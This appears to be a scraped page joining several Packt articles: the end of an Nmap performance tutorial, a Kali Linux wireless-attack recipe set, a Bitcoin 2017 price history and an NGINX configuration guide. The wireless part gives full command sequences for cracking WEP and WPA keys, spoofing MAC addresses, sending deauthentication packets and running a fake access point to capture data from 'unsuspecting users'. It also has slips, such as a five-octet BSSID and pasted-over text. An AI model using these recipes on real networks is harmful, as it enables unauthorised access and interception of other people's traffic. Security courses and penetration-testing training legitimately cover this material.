There is also a very important argument that can be used to limit the number of packets sent per second by Nmap. The arguments --min-rate and --max-rate need to be used carefully to avoid undesirable effects. These rates are set automatically by Nmap if the arguments are not present:

# nmap -A -p- --min-rate 50 --max-rate 100 <target>

Finally, the arguments --min-parallelism and --max-parallelism can be used to control the number of probes for a host group. By setting these arguments, Nmap will no longer adjust the values dynamically:

# nmap -A --max-parallelism 1 <target>
# nmap -A --min-parallelism 10 --max-parallelism 250 <target>

There's more...

If you would like Nmap to give up on a host after a certain amount of time, you can set the argument --host-timeout, as shown in the following command:

# nmap -sV -A -p- --host-timeout 5m <target>

Interactive mode in Nmap allows users to press keys to dynamically change the runtime variables, such as verbose, debugging, and packet tracing. Although the discussion of including timing and performance options in the interactive mode has come up a few times in the development mailing list, so far this hasn't been implemented. However, there is an unofficial patch submitted in June 2012 that allows you to change the minimum and maximum packet rate values (--max-rate and --min-rate) dynamically. If you would like to try it out, it's located at http://seclists.org/nmap-dev/2012/q2/883.

To further customize your scans, it is important that you understand the scan phases of Nmap. See Appendix - Scanning Phases for more information.

Summary

In this article, we learned how to implement and optimize scans, and how to distribute Nmap scans among several clients, allowing us to save time and take advantage of extra bandwidth and CPU resources.
This article is short but full of tips for optimizing your scans. Prepare to dig deep into Nmap's internals and the timing and performance parameters!
Wireless Attacks in Kali Linux

Packt
11 Oct 2013
13 min read
In this article, by Willie L. Pritchett, author of the Kali Linux Cookbook, we will learn about various wireless attacks. These days, wireless networks are everywhere. With users being on the go like never before, having to remain stationary because of having to plug into an Ethernet cable to gain Internet access is not feasible. For this convenience, there is a price to be paid; wireless connections are not as secure as Ethernet connections. In this article, we will explore various methods for manipulating radio network traffic, including mobile phones and wireless networks. We will cover the following topics in this article:

Wireless network WEP cracking
Wireless network WPA/WPA2 cracking
Automating wireless network cracking
Accessing clients using a fake AP
URL traffic manipulation
Port redirection
Sniffing network traffic

(For more resources related to this topic, see here.)

Wireless network WEP cracking

Wired Equivalent Privacy, or WEP as it's commonly referred to, has been around since 1999 and is an older security standard that was used to secure wireless networks. In 2003, WEP was replaced by WPA and later by WPA2. Due to having more secure protocols available, WEP encryption is rarely used. As a matter of fact, it is highly recommended that you never use WEP encryption to secure your network! There are many known ways to exploit WEP encryption, and we will explore one of those ways in this recipe.

In this recipe, we will use the AirCrack suite to crack a WEP key. The AirCrack suite (or AirCrack NG, as it's commonly referred to) is a WEP and WPA key cracking program that captures network packets, analyzes them, and uses this data to crack the WEP key.

Getting ready

In order to perform the tasks of this recipe, experience with the Kali terminal window is required. A supported wireless card configured for packet injection will also be required.
In the case of a wireless card, packet injection involves sending a packet, or injecting it, onto an already established connection between two parties. Please ensure that your wireless card allows packet injection, as this is not something that all wireless cards support.

How to do it...

Let's begin the process of using AirCrack to crack a network session secured by WEP.

Open a terminal window and bring up a list of wireless network interfaces:

airmon-ng

Under the interface column, select one of your interfaces. In this case, we will use wlan0. If you have a different interface, such as mon0, please substitute it at every location where wlan0 is mentioned.

Next, we need to stop the wlan0 interface and take it down so that we can change our MAC address in the next step:

airmon-ng stop wlan0
ifconfig wlan0 down

Next, we need to change the MAC address of our interface. Since the MAC address of your machine identifies you on any network, changing the identity of our machine allows us to keep our true MAC address hidden. In this case, we will use 00:11:22:33:44:55:

macchanger --mac 00:11:22:33:44:55 wlan0

Now we need to restart airmon-ng:

airmon-ng start wlan0

Next, we will use airodump to locate the available wireless networks nearby:

airodump-ng wlan0

A listing of available networks will begin to appear. Once you find the one you want to attack, press Ctrl + C to stop the search. Highlight the MAC address in the BSSID column, right-click your mouse, and select copy. Also, make a note of the channel that the network is transmitting its signal upon. You will find this information in the Channel column. In this case, the channel is 10.

Now we run airodump and copy the information for the selected BSSID to a file. We will utilize the following options:

-c allows us to select our channel. In this case, we use 10.
-w allows us to select the name of our file. In this case, we have chosen wirelessattack.
--bssid allows us to select our BSSID.
In this case, we will paste 09:AC:90:AB:78 from the clipboard:

airodump-ng -c 10 -w wirelessattack --bssid 09:AC:90:AB:78 wlan0

A new terminal window will open, displaying the output from the previous command. Leave this window open.

Open another terminal window; to attempt to make an association, we will run aireplay, which has the following syntax: aireplay-ng -1 0 -a [BSSID] -h [our chosen MAC address] -e [ESSID] [Interface]:

aireplay-ng -1 0 -a 09:AC:90:AB:78 -h 00:11:22:33:44:55 -e backtrack wlan0

Next, we send some traffic to the router so that we have some data to capture. We use aireplay again in the following format: aireplay-ng -3 -b [BSSID] -h [our chosen MAC address] [Interface]:

aireplay-ng -3 -b 09:AC:90:AB:78 -h 00:11:22:33:44:55 wlan0

Your screen will begin to fill with traffic. Let this process run for a minute or two, until we have enough information to run the crack. Finally, we run AirCrack to crack the WEP key:

aircrack-ng -b 09:AC:90:AB:78 wirelessattack.cap

That's it!

How it works...

In this recipe, we used the AirCrack suite to crack the WEP key of a wireless network. AirCrack is one of the most popular programs for cracking WEP. AirCrack works by gathering packets from a wireless connection over WEP and then mathematically analyzing the data to crack the WEP encrypted key. We began the recipe by starting AirCrack and selecting our desired interface. Next, we changed our MAC address, which allowed us to change our identity on the network, and then searched for available wireless networks to attack using airodump. Once we found the network we wanted to attack, we used aireplay to associate our machine with the MAC address of the wireless device we were attacking. We concluded by gathering some traffic and then brute-forcing the generated CAP file in order to get the wireless password.
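The steps above can be collected into a single sketch script. The interface, BSSID, channel, and MAC below are the placeholder values from the recipe (substitute your own), and every command is echoed rather than executed, so the sequence can be reviewed safely before running anything against a network you are authorized to test:

```shell
#!/bin/sh
# Sketch: the WEP cracking recipe as a dry-run command sequence.
# All values are placeholders taken from the recipe text above.
IFACE=wlan0
FAKE_MAC=00:11:22:33:44:55
BSSID=09:AC:90:AB:78      # placeholder BSSID from the recipe
CHANNEL=10
CAPFILE=wirelessattack

echo "airmon-ng stop $IFACE"
echo "ifconfig $IFACE down"
echo "macchanger --mac $FAKE_MAC $IFACE"
echo "airmon-ng start $IFACE"
echo "airodump-ng -c $CHANNEL -w $CAPFILE --bssid $BSSID $IFACE"
echo "aireplay-ng -1 0 -a $BSSID -h $FAKE_MAC -e backtrack $IFACE"
echo "aireplay-ng -3 -b $BSSID -h $FAKE_MAC $IFACE"

# The final cracking step operates on the capture file airodump-ng wrote.
CRACK_CMD="aircrack-ng -b $BSSID $CAPFILE.cap"
echo "$CRACK_CMD"
```

Removing the echo wrappers would execute the recipe for real; leaving them in place makes it easy to double-check the BSSID and channel first.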
Wireless network WPA/WPA2 cracking

Wi-Fi Protected Access, or WPA as it's commonly referred to, has been around since 2003 and was created to secure wireless networks and replace the outdated previous standard, WEP encryption. In 2003, WEP was replaced by WPA and later by WPA2. Due to having more secure protocols available, WEP encryption is rarely used.

In this recipe, we will use the AirCrack suite to crack a WPA key. The AirCrack suite (or AirCrack NG, as it's commonly referred to) is a WEP and WPA key cracking program that captures network packets, analyzes them, and uses this data to crack the WPA key.

Getting ready

In order to perform the tasks of this recipe, experience with the Kali Linux terminal window is required. A supported wireless card configured for packet injection will also be required. In the case of a wireless card, packet injection involves sending a packet, or injecting it, onto an already established connection between two parties.

How to do it...

Let's begin the process of using AirCrack to crack a network session secured by WPA.

Open a terminal window and bring up a list of wireless network interfaces:

airmon-ng

Under the interface column, select one of your interfaces. In this case, we will use wlan0. If you have a different interface, such as mon0, please substitute it at every location where wlan0 is mentioned.

Next, we need to stop the wlan0 interface and take it down:

airmon-ng stop wlan0
ifconfig wlan0 down

Next, we need to change the MAC address of our interface. In this case, we will use 00:11:22:33:44:55:

macchanger --mac 00:11:22:33:44:55 wlan0

Now we need to restart airmon-ng:

airmon-ng start wlan0

Next, we will use airodump to locate the available wireless networks nearby:

airodump-ng wlan0

A listing of available networks will begin to appear. Once you find the one you want to attack, press Ctrl + C to stop the search. Highlight the MAC address in the BSSID column, right-click, and select copy.
Also, make a note of the channel that the network is transmitting its signal upon. You will find this information in the Channel column. In this case, the channel is 10.

Now we run airodump and copy the information for the selected BSSID to a file. We will utilize the following options:

-c allows us to select our channel. In this case, we use 10.
-w allows us to select the name of our file. In this case, we have chosen wirelessattack.
--bssid allows us to select our BSSID.

In this case, we will paste 09:AC:90:AB:78 from the clipboard:

airodump-ng -c 10 -w wirelessattack --bssid 09:AC:90:AB:78 wlan0

A new terminal window will open, displaying the output from the previous command. Leave this window open.

Open another terminal window; to attempt to make an association, we will run aireplay, which has the following syntax: aireplay-ng --deauth 1 -a [BSSID] -c [our chosen MAC address] [Interface]. This process may take a few moments:

aireplay-ng --deauth 1 -a 09:AC:90:AB:78 -c 00:11:22:33:44:55 wlan0

Finally, we run AirCrack to crack the WPA key. The -w option allows us to specify the location of our wordlist. We will use the .cap file that we named earlier. In this case, the file's name is wirelessattack.cap:

aircrack-ng -w ./wordlist.lst wirelessattack.cap

That's it!

How it works...

In this recipe, we used the AirCrack suite to crack the WPA key of a wireless network. AirCrack is one of the most popular programs for cracking WPA. AirCrack works by gathering packets from a wireless connection over WPA and then brute-forcing passwords against the gathered data until a successful handshake is established. We began the recipe by starting AirCrack and selecting our desired interface. Next, we changed our MAC address, which allowed us to change our identity on the network, and then searched for available wireless networks to attack using airodump.
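The two WPA-specific steps (forcing a reauthentication to capture a handshake, then running the wordlist attack) can likewise be sketched as a dry-run script. The BSSID, client MAC, and wordlist path are placeholder assumptions; both commands are printed rather than run:

```shell
#!/bin/sh
# Sketch: the WPA handshake capture and dictionary attack, printed as a dry run.
# All values below are placeholders from the recipe text.
IFACE=wlan0
BSSID=09:AC:90:AB:78        # placeholder BSSID
CLIENT_MAC=00:11:22:33:44:55
WORDLIST=./wordlist.lst      # assumed wordlist path

DEAUTH_CMD="aireplay-ng --deauth 1 -a $BSSID -c $CLIENT_MAC $IFACE"
CRACK_CMD="aircrack-ng -w $WORDLIST wirelessattack.cap"

echo "$DEAUTH_CMD"
echo "$CRACK_CMD"
```

Unlike WEP, the WPA attack only succeeds if the wordlist actually contains the passphrase, which is why the choice of $WORDLIST matters far more than the capture itself.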
Once we found the network we wanted to attack, we used aireplay to associate our machine with the MAC address of the wireless device we were attacking. We concluded by gathering some traffic and then brute-forcing the generated CAP file in order to get the wireless password.

Automating wireless network cracking

In this recipe, we will use Gerix to automate a wireless network attack. Gerix is an automated GUI for AirCrack. Gerix comes installed by default on Kali Linux and will speed up your wireless network cracking efforts.

Getting ready

A supported wireless card configured for packet injection will be required to complete this recipe. In the case of a wireless card, packet injection involves sending a packet, or injecting it, onto an already established connection between two parties.

How to do it...

Let's begin the process of performing an automated wireless network crack with Gerix by downloading it.

Using wget, download Gerix from the following website:

wget https://bitbucket.org/Skin36/gerix-wifi-cracker-pyqt4/downloads/gerix-wifi-cracker-master.rar

Once the file has been downloaded, we need to extract the data from the RAR file:

unrar x gerix-wifi-cracker-master.rar

Now, to keep things consistent, let's move the Gerix folder to the /usr/share directory with the other penetration testing tools:

mv gerix-wifi-cracker-master /usr/share/gerix-wifi-cracker

Let's navigate to the directory where Gerix is located:

cd /usr/share/gerix-wifi-cracker

To begin using Gerix, we issue the following command:

python gerix.py

Click on the Configuration tab. On the Configuration tab, select your wireless interface. Click on the Enable/Disable Monitor Mode button. Once Monitor mode has been enabled successfully, under Select Target Network, click on the Rescan Networks button. The list of targeted networks will begin to fill. Select a wireless network to target. In this case, we select a WEP encrypted network. Click on the WEP tab.
Under Functionalities, click on the Start Sniffing and Logging button. Click on the subtab WEP Attacks (No Client). Click on the Start false access point authentication on victim button. Click on the Start the ChopChop attack button. In the terminal window that opens, answer Y to the Use this packet question. Once completed, copy the .cap file generated. Click on the Create the ARP packet to be injected on the victim access point button. Click on the Inject the created packet on victim access point button. In the terminal window that opens, answer Y to the Use this packet question. Once you have gathered approximately 20,000 packets, click on the Cracking tab. Click on the Aircrack-ng - Decrypt WEP Password button. That's it!

How it works...

In this recipe, we used Gerix to automate a crack on a wireless network in order to obtain the WEP key. We began the recipe by launching Gerix and enabling the monitor mode interface. Next, we selected our victim from a list of attack targets provided by Gerix. After we started sniffing the network traffic, we used the ChopChop attack to generate the CAP file. We concluded the recipe by gathering 20,000 packets and brute-forcing the CAP file with AirCrack. With Gerix, we were able to automate the steps to crack a WEP key without having to manually type commands in a terminal window. This is an excellent way to quickly and efficiently break into a WEP-secured network.

Accessing clients using a fake AP

In this recipe, we will use Gerix to create and set up a fake access point (AP). Setting up a fake access point gives us the ability to gather information on each of the computers that access it. People in this day and age will often sacrifice security for convenience. Connecting to an open wireless access point to send a quick e-mail or to quickly log into a social network is rather convenient. Gerix is an automated GUI for AirCrack.
Getting ready

A supported wireless card configured for packet injection will be required to complete this recipe. In the case of a wireless card, packet injection involves sending a packet, or injecting it, onto an already established connection between two parties.

How to do it...

Let's begin the process of creating a fake AP with Gerix.

Let's navigate to the directory where Gerix is located:

cd /usr/share/gerix-wifi-cracker

To begin using Gerix, we issue the following command:

python gerix.py

Click on the Configuration tab. On the Configuration tab, select your wireless interface. Click on the Enable/Disable Monitor Mode button. Once Monitor mode has been enabled successfully, under Select Target Network, press the Rescan Networks button. The list of targeted networks will begin to fill. Select a wireless network to target. In this case, we select a WEP encrypted network. Click on the Fake AP tab. Change the Access Point ESSID from honeypot to something less suspicious. In this case, we are going to use personalnetwork. We will use the defaults for each of the other options. To start the fake access point, click on the Start Face Access Point button. That's it!

How it works...

In this recipe, we used Gerix to create a fake AP. Creating a fake AP is an excellent way of collecting information from unsuspecting users. The reason fake access points are a great tool to use is that, to your victim, they appear to be a legitimate access point, thus making them trusted by the user. Using Gerix, we were able to automate the setup of a fake access point in a few short clicks.
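Since Gerix is a GUI for the AirCrack suite, a comparable fake access point can also be started from the command line with airbase-ng, the suite's AP emulation tool. This is offered as an assumed alternative rather than what Gerix does step for step; the ESSID and channel below mirror the recipe's placeholder values, and the command is echoed rather than executed:

```shell
#!/bin/sh
# Sketch: a fake AP via airbase-ng (aircrack-ng suite), as a CLI alternative
# to Gerix's Fake AP tab. Values are illustrative placeholders.
IFACE=wlan0
ESSID=personalnetwork   # the less suspicious ESSID chosen in the recipe
CHANNEL=10

AP_CMD="airbase-ng -e $ESSID -c $CHANNEL $IFACE"
echo "$AP_CMD"
```

As with the Gerix version, the interface must already be in monitor mode before the access point is brought up.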
There and back again: Decrypting Bitcoin's 2017 journey from $1000 to $20000

Ashwin Nair
28 Dec 2017
7 min read
Lately, Bitcoin has emerged as the most popular topic of discussion amongst colleagues, friends, and family. The conversations more or less have a similar theme - filled with inane theories around what Bitcoin is and the growing fear of missing out on Bitcoin mania. Well, to be fair, who would want to miss out on an opportunity to grow their money by more than 1000%? That's the return posted by Bitcoin since the start of the year. Bitcoin, at the time of writing this article, is at $15,000 with a market cap over $250 billion. To put the hype in context, Bitcoin is now valued higher than 90% of the companies in the S&P 500 list.

Supposedly invented by an anonymous group or an individual under the alias Satoshi Nakamoto in 2009, Bitcoin has been seen as a digital currency that the internet might not need but one that it deserves. Satoshi's vision was to create a robust electronic payment system that functions smoothly without a need for a trusted third party. This was achievable with the help of Blockchain, a digital ledger which records transactions in an indelible fashion and is distributed across multiple nodes. This ensured that no transaction is altered or deleted, thus completely eliminating the need for a trusted third party.

For all the excitement around Bitcoin and the increase in interest towards owning one, the thought of dissecting the roller coaster journey from sub-$1000 levels to $15,000 this year seemed pretty exciting.

Started the year with a bang / Global uncertainties leading to the Bitcoin rally - Oct 2016 to Jan 2017

Global uncertainties played a big role in driving Bitcoin's price, and boy, 2016 was full of them! From Brexit to Trump winning the US elections, and major economic commotion in terms of the devaluation of China's Yuan and India's demonetization drive, all of it led to investors seeking shelter in Bitcoin.

The first blip - Jan 2017 to March 2017

China as a country has had a major impact in determining Bitcoin's fate.
In early 2017, China contributed over 80% of Bitcoin transactions, indicating the amount of power Chinese traders and investors had in controlling Bitcoin's price. However, the People's Bank of China's closer inspection of the exchanges revealed several irregularities in their transactions and business practices, which eventually led to officials halting withdrawals using Bitcoin transactions and taking stringent steps towards cryptocurrency exchanges.

Source - Bloomberg

On the path to becoming mainstream and gaining support from Ethereum - Mar 2017 to June 2017

During this phase, we saw the rise of another cryptocurrency, Ethereum, a close digital cousin of Bitcoin. Similar to Bitcoin, Ethereum is also built on top of Blockchain technology, allowing it to build a decentralized public network. However, Ethereum's capabilities extend beyond being a cryptocurrency, helping developers build and deploy any kind of decentralized application.

Ethereum's valuation in this period rose from $20 to $375, which was quite beneficial for Bitcoin, as every reference to Ethereum had Bitcoin mentioned as well, whether it was to explain what Ethereum is or how it could take the number 1 cryptocurrency spot in the future. This, coupled with the rise in Blockchain's popularity, increased Bitcoin's visibility within the USA. The media started observing politicians, celebrities, and other prominent personalities speaking on Bitcoin as well. Bitcoin also received a major boost from Chinese exchanges, wherein withdrawals of the cryptocurrency resumed after a nearly four-month freeze. All these factors led to Bitcoin crossing an all-time high of $2500, up by more than 150% since the start of the year.

The curious case of the fork - June 2017 to September 2017

The month of July saw the cryptocurrency market cap witness a sharp decline, with questions being raised about the price volatility and whether Bitcoin's rally for the year was over. We can, of course, now confidently debunk that question.
Though there hasn't been any proven rationale behind the decline, one of the reasons seems to be profit booking following months of steep rally in the valuations witnessed by Bitcoin. Another major factor that might have driven the price collapse was an unresolved dispute among leading members of the Bitcoin community over how to overcome the growing problem of Bitcoin being slow and expensive.

With the growing usage of Bitcoin, its performance in terms of transaction time had slowed down. Bitcoin's network, due to its limitation in terms of block size, could only execute around 7 transactions per second, compared to the VISA network, which could do over 1600 transactions. This also led to transaction fees increasing substantially, to $5.00 per transaction, and settlement times often taking hours and even days. This eventually put Bitcoin's flaw in the spotlight when compared with services offered by competitors such as PayPal in terms of cost and transaction time.

Source - Coinmarketcap

The poor performance of Bitcoin led investors to opt for other cryptocurrencies. The above graph shows how Bitcoin's dominance fell substantially compared to other cryptocurrencies, such as Ethereum and Litecoin, during this time.

With the core community still unable to come to a consensus on how to improve the performance and update the software, the prospect of a "fork" was raised. A fork is a change in the underlying software protocol of Bitcoin that makes previous rules valid or invalid. There are two types of blockchain forks - soft forks and hard forks. Around August, the community announced it would go ahead with a hard fork in the form of Bitcoin Cash. This news was surprisingly taken in a positive manner, leading to Bitcoin rebounding strongly and reaching a new high of around $4000.

Once bitten, twice shy (China) - September 2017 to October 2017

Source - Zerohedge

The month of September saw another setback for Bitcoin due to measures taken by the People's Bank of China.
This time, the PBoC banned initial coin offerings (ICOs), thus prohibiting the practice of building and selling cryptocurrency to investors or using it to finance any startup projects within China. Based on a report by the National Committee of Experts on Internet Financial Security Technology, Chinese investors were involved in 2.6 billion Yuan worth of ICOs in January-June 2017, reflecting China's exposure to Bitcoin.

My Precious (October 2017 to December 2017)

Source - Manmanroe

During the last quarter, Bitcoin's surge has shocked even hardcore Bitcoin fanatics. Everything seems to be going right for Bitcoin at the moment. While at the start of the year China was the major contributor towards the hike in Bitcoin's valuation, the momentum now seems to have shifted to a much more sensible and responsible market in Japan, which has embraced Bitcoin in quite a positive manner. As you can see from the below graph, Japan now holds more than 50% of transactions, compared to a much smaller share for the USA. Besides Japan, we are also seeing positive developments in countries such as Russia and India, which are looking to legalize cryptocurrency usage. Moreover, the level of interest in Bitcoin from institutional investors is at its peak. All these factors resulted in Bitcoin crossing the five-digit mark for the first time in November 2017 and touching an all-time high of close to $20,000 in December 2017.

Post the record high, Bitcoin has been witnessing a crash-and-rebound phenomenon in the last two weeks of December. From a record high of $20,000 to $11,000 and now at $15,000, Bitcoin is still a volatile digital currency if one is looking for quick price appreciation. Despite the valuation dilemma and the price volatility, one thing is sure: the world is warming up to the idea of cryptocurrencies and even owning one. There are already several predictions being made on how Bitcoin's astronomical growth is going to continue in 2018.
However, Bitcoin needs to overcome several challenges before it can replace traditional currency and be widely accepted in banking practices. Besides the rise of other cryptocurrencies such as Ethereum, Litecoin, and Bitcoin Cash, which are looking to dethrone Bitcoin from the #1 spot, there are broader issues at hand that the Bitcoin community should prioritize, such as how to curb the effect of Bitcoin's mining activities on the environment, and securing smoother reforms and regulatory roadmaps from countries, so that people actually start using Bitcoin instead of just looking at it as a tool for making a quick buck.
A Configuration Guide

Packt
08 Nov 2016
13 min read
In this article by Dimitri Aivaliotis, author of Mastering NGINX - Second Edition, we will see that the NGINX configuration file follows a very logical format. Learning this format and how to use each section is one of the building blocks that will help you to create a configuration file by hand. Constructing a configuration involves specifying global parameters as well as directives for each individual section. These directives and how they fit into the overall configuration file are the main subject of this article. The goal is to understand how to create the right configuration file to meet your needs.

(For more resources related to this topic, see here.)

The basic configuration format

The basic NGINX configuration file is set up in a number of sections. Each section is delineated as shown:

<section> {
    <directive> <parameters>;
}

It is important to note that each directive line ends with a semicolon (;). This marks the end of the line. The curly braces ({}) actually denote a new configuration context, but we will read these as sections for the most part.

The NGINX global configuration parameters

The global section is used to configure the parameters that affect the entire server and is an exception to the format shown in the preceding section. The global section may include configuration directives, such as user and worker_processes, as well as sections, such as events. There are no opening and closing braces ({}) surrounding the global section. The most important configuration directives in the global context are shown in the following list. These configuration directives will be the ones that you will be dealing with for the most part.

user: The user and group under which the worker processes run is configured using this parameter. If the group is omitted, a group name equal to that of the user is used.

worker_processes: This directive shows the number of worker processes that will be started.
These processes will handle all the connections made by the clients. Choosing the right number depends on the server environment, the disk subsystem, and the network infrastructure. A good rule of thumb is to set this equal to the number of processor cores for CPU-bound loads and to multiply this number by 1.5 to 2 for I/O-bound loads.

error_log: This directive is where all the errors are written. If no other error_log is given in a separate context, this log file will be used for all errors, globally. A second parameter to this directive indicates the level at which (debug, info, notice, warn, error, crit, alert, and emerg) errors are written to the log. Note that debug-level errors are only available if the --with-debug configuration switch is given at compilation time.

pid: This directive is the file where the process ID of the main process is written, overwriting the compiled-in default.

use: This directive indicates the connection processing method that should be used. This will overwrite the compiled-in default and must be contained in an events context, if used. It will not normally need to be overridden, except when the compiled-in default is found to produce errors over time.

worker_connections: This directive configures the maximum number of simultaneous connections that a worker process may have open. This includes, but is not limited to, client connections and connections to upstream servers. This is especially important on reverse proxy servers - some additional tuning may be required at the operating system level in order to reach this number of simultaneous connections.
Here is a small example using each of these directives:

# we want nginx to run as user 'www'
user www;

# the load is CPU-bound and we have 12 cores
worker_processes 12;

# explicitly specifying the path to the mandatory error log
error_log /var/log/nginx/error.log;

# also explicitly specifying the path to the pid file
pid /var/run/nginx.pid;

# sets up a new configuration context for the 'events' module
events {
    # we're on a Solaris-based system and have determined that nginx
    # will stop responding to new requests over time with the default
    # connection-processing mechanism, so we switch to the second-best
    use /dev/poll;

    # the product of this number and the number of worker_processes
    # indicates how many simultaneous connections per IP:port pair are
    # accepted
    worker_connections 2048;
}

This section will be placed at the top of the nginx.conf configuration file.

Using the include files

The include files can be used anywhere in your configuration file to help it be more readable and to enable you to reuse parts of your configuration. To use them, make sure that the files themselves contain syntactically correct NGINX configuration directives and blocks; then specify a path to those files:

include /opt/local/etc/nginx/mime.types;

A wildcard may appear in the path to match multiple files:

include /opt/local/etc/nginx/vhost/*.conf;

If the full path is not given, NGINX will search relative to its main configuration file. A configuration file can easily be tested by calling NGINX as follows:

nginx -t -c <path-to-nginx.conf>

This command will test the configuration, including all files separated out into the include files, for syntax errors.
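As a quick sketch of the include mechanism, the following creates a throwaway directory holding one hypothetical vhost file plus a main file that pulls it in with a wildcard include, and then prints the nginx -t command you would run to validate it. The paths here are temporary illustrations, not the /opt/local layout used above:

```shell
#!/bin/sh
# Sketch: a minimal include-file layout, built in a temporary directory.
CONF_DIR=$(mktemp -d)
mkdir -p "$CONF_DIR/vhost"

# One hypothetical per-site file; real deployments would have one per vhost.
cat > "$CONF_DIR/vhost/example.conf" <<'EOF'
server {
    listen 80;
    server_name www.example.com;
}
EOF

# The main file picks up every vhost with a single wildcard include.
cat > "$CONF_DIR/nginx.conf" <<EOF
http {
    include $CONF_DIR/vhost/*.conf;
}
EOF

# Printed rather than run, since nginx may not be installed here.
echo "nginx -t -c $CONF_DIR/nginx.conf"
```

Splitting vhosts out this way keeps the main file short and lets you add or remove sites without touching nginx.conf at all.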
Sample configuration

The following code is an example of an HTTP configuration section:

http {
    include /opt/local/etc/nginx/mime.types;
    default_type application/octet-stream;
    sendfile on;
    tcp_nopush on;
    tcp_nodelay on;
    keepalive_timeout 65;
    server_names_hash_max_size 1024;
}

This context block would go after any global configuration directives in the nginx.conf file.

The virtual server section

Any context beginning with the keyword server is considered a virtual server section. It describes a logical separation of a set of resources that will be delivered under a different server_name directive. These virtual servers respond to HTTP requests, and are contained within the http section. A virtual server is defined by a combination of the listen and server_name directives. The listen directive defines an IP address/port combination or a path to a UNIX-domain socket:

listen address[:port];
listen port;
listen unix:path;

The listen directive uniquely identifies a socket binding under NGINX. There are a number of optional parameters that listen can take:

default_server: defines this address/port combination as the default for the requests bound here.
setfib: sets the corresponding FIB for the listening socket. Only supported on FreeBSD, and not for UNIX-domain sockets.
backlog: sets the backlog parameter in the listen() call. Defaults to -1 on FreeBSD and 511 on all other platforms.
rcvbuf: sets the SO_RCVBUF parameter on the listening socket.
sndbuf: sets the SO_SNDBUF parameter on the listening socket.
accept_filter: sets the name of the accept filter to either dataready or httpready. Only supported on FreeBSD.
deferred: sets the TCP_DEFER_ACCEPT option to use a deferred accept() call. Only supported on Linux.
bind: makes a separate bind() call for this address/port pair. A separate bind() call will be made implicitly if any of the other socket-specific parameters are used.
ipv6only: sets the value of the IPV6_ONLY parameter. Can only be set on a fresh start, and not for UNIX-domain sockets.
ssl: indicates that only HTTPS connections will be made on this port. Allows for a more compact configuration.
so_keepalive: configures the TCP keepalive connection for the listening socket.

The server_name directive is fairly straightforward, and it can be used to solve a number of configuration problems. Its default value is "", which means that a server section without a server_name directive will match a request that has no Host header field set. This can be used, for example, to drop requests that lack this header:

server {
    listen 80;
    return 444;
}

The nonstandard HTTP code 444, used in this example, will cause NGINX to immediately close the connection. Besides a normal string, NGINX will accept a wildcard as a parameter to the server_name directive:

The wildcard can replace the subdomain part: *.example.com
The wildcard can replace the top-level domain part: www.example.*
A special form will match the subdomain or the domain itself: .example.com (matches *.example.com as well as example.com)

A regular expression can also be used as a parameter to server_name by prepending the name with a tilde (~):

server_name ~^www\.example\.com$;
server_name ~^www(\d+)\.example\.(com)$;

The latter form is an example using captures, which can later be referenced (as $1, $2, and so on) in further configuration directives. NGINX uses the following logic when determining which virtual server should serve a specific request:

1. Match the IP address and port to the listen directive.
2. Match the Host header field against the server_name directive as a string.
3. Match the Host header field against the server_name directive with a wildcard at the beginning of the string.
4. Match the Host header field against the server_name directive with a wildcard at the end of the string.
5. Match the Host header field against the server_name directive as a regular expression.
6. If all the Host header matches fail, direct to the listen directive marked as default_server.
7. If all the Host header matches fail and there is no default_server, direct to the first server with a listen directive that satisfies step 1.

This logic is expressed in the following flowchart:

The default_server parameter can be used to handle requests that would otherwise go unhandled. It is therefore recommended to always set default_server explicitly, so that these unhandled requests will be handled in a defined manner. Besides this usage, default_server may also be helpful in configuring a number of virtual servers with the same listen directive. Any directives set here will be the same for all matching server blocks.

Locations – where, when, and how

The location directive may be used within a virtual server section and indicates a URI that comes either from the client or from an internal redirect. Locations may be nested, with a few exceptions. They are used for processing requests with as specific a configuration as possible. A location is defined as follows:

location [modifier] uri {...}

Or it can be defined for a named location:

location @name {…}

A named location is only reachable from an internal redirect. It preserves the URI as it was before entering the location block. It may only be defined at the server context level. The modifiers affect the processing of a location in the following way:

=: uses exact match and terminates the search.
~: uses case-sensitive regular expression matching.
~*: uses case-insensitive regular expression matching.
^~: stops processing before regular expressions are checked for a match of this location's string, if it's the most specific match. Note that this is not a regular expression match; its purpose is to preempt regular expression matching.

When a request comes in, the URI is checked against the most specific location as follows:

Locations without a regular expression are searched for the most specific match, independent of the order in which they are defined.
Regular expressions are matched in the order in which they are found in the configuration file. The regular expression search is terminated on the first match. The most specific location match is then used for request processing.

The comparison match described here is against decoded URIs; for example, a %20 instance in a URI will match against a " " (space) specified in a location. A named location may only be used by internally redirected requests. The following directives are found only within a location:

alias: defines another name for the location, as found on the filesystem. If the location is specified with a regular expression, alias should reference captures defined in that regular expression. The alias directive replaces the part of the URI matched by the location, such that the rest of the URI not matched will be searched for in that filesystem location. Using the alias directive is fragile when moving bits of the configuration around, so using the root directive is preferred, unless the URI needs to be modified in order to find the file.
internal: specifies a location that can only be used for internal requests (redirects defined in other directives, rewrite requests, error pages, and so on).
limit_except: limits a location to the specified HTTP verb(s) (GET also includes HEAD).

Additionally, a number of directives found in the http section may also be specified in a location.
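The location forms just described can be combined in a single server block. The following is an illustrative sketch; the server name and filesystem paths are placeholders, not examples from the book:

```nginx
server {
    listen 80;
    server_name www.example.com;

    # exact match: checked first, and terminates the search
    location = /robots.txt {
        root /var/www/static;
    }

    # ^~ prefix match: preempts the regular-expression locations below
    location ^~ /downloads/ {
        # alias replaces the matched part of the URI on the filesystem
        alias /srv/files/;
    }

    # case-insensitive regular expression match
    location ~* \.(png|jpg|gif)$ {
        expires 30d;
    }

    # restrict this location to GET (and, implicitly, HEAD) requests
    location /status {
        limit_except GET {
            deny all;
        }
    }
}
```

Requests that match none of these locations are served according to the server-level configuration.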
Refer to Appendix A, Directive Reference, for a complete list. The try_files directive deserves special mention here. It may also be used in a server context, but will most often be found in a location. The try_files directive will do just that: try files in the order given as parameters; the first match wins. It is often used to match potential files from a variable and then pass processing to a named location, as shown in the following example:

location / {
    try_files $uri $uri/ @mongrel;
}

location @mongrel {
    proxy_pass http://appserver;
}

Here, an implicit directory index is tried if the given URI is not found as a file, and then processing is passed on to appserver via a proxy. We will explore how best to use location, try_files, and proxy_pass to solve specific problems throughout the rest of the article. Locations may be nested, except in the following situations:

When the prefix is =
When the location is a named location

Best practice dictates that regular expression locations be nested inside string-based locations. An example of this is as follows:

# first, we enter through the root
location / {
    # then we find a most-specific substring
    # note that this is not a regular expression
    location ^~ /css {
        # here is the regular expression that then gets matched
        location ~* /css/.*\.css$ {
        }
    }
}

Summary

